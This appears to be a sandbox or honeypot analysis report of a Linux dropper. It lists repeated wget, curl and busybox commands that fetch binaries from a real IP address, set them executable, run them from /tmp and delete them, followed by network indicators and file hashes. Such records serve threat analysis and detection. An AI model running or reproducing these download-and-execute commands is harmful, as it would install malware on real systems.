[wget http://87.120.126.196/bins/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]
/bin/chmod
[chmod 777 yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]
/tmp/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV
[./yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]
/bin/rm
[rm yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]
/usr/bin/wget
[wget http://87.120.126.196/bins/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]
/bin/chmod
[chmod 777 ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]
/tmp/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad
[./ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]
/bin/rm
[rm ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]
/usr/bin/wget
[wget http://87.120.126.196/bins/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]
/bin/chmod
[chmod 777 ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]
/tmp/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad
[./ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]
/bin/rm
[rm ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]
/usr/bin/wget
[wget http://87.120.126.196/bins/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]
/bin/chmod
[chmod 777 q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]
/tmp/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff
[./q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]
/bin/rm
[rm q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]
/usr/bin/wget
[wget http://87.120.126.196/bins/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]
/bin/chmod
[chmod 777 KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]
/tmp/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp
[./KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]
/bin/rm
[rm KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]
/usr/bin/wget
[wget http://87.120.126.196/bins/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]
/bin/chmod
[chmod 777 yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]
/tmp/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV
[./yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]
/bin/rm
[rm yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]
/usr/bin/wget
[wget http://87.120.126.196/bins/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]
/bin/chmod
[chmod 777 3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]
/tmp/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3
[./3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]
/bin/rm
[rm 3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]
/usr/bin/wget
[wget http://87.120.126.196/bins/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]
/bin/chmod
[chmod 777 aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]
/tmp/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl
[./aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]
/bin/rm
[rm aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]
/usr/bin/wget
[wget http://87.120.126.196/bins/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]
/bin/chmod
[chmod 777 c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]
/tmp/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV
[./c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]
/bin/rm
[rm c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]
/usr/bin/wget
[wget http://87.120.126.196/bins/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]
/bin/chmod
[chmod 777 fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]
/tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC
[./fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]
/bin/rm
[rm fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]
/usr/bin/wget
[wget http://87.120.126.196/bins/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]
/bin/chmod
[chmod 777 l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]
/tmp/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe
[./l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]
/bin/rm
[rm l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]
/usr/bin/wget
[wget http://87.120.126.196/bins/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]
/bin/chmod
[chmod 777 vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]
/tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB
[./vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]
/bin/rm
[rm vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]
/usr/bin/wget
[wget http://87.120.126.196/bins/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]
/bin/chmod
[chmod 777 mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]
/tmp/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr
[./mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]
/bin/rm
[rm mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]
/usr/bin/wget
[wget http://87.120.126.196/bins/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]
/bin/chmod
[chmod 777 EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]
/tmp/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm
[./EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]
/bin/rm
[rm EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]
/usr/bin/wget
[wget http://87.120.126.196/bins/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]
/bin/chmod
[chmod 777 Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]
/tmp/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr
[./Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]
/bin/rm
[rm Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]
/usr/bin/wget
[wget http://87.120.126.196/bins/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]
/bin/chmod
[chmod 777 PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]
/tmp/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC
[./PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]
/bin/rm
[rm PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]
Network
| Country | Destination | Domain | Proto |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
Files
/tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |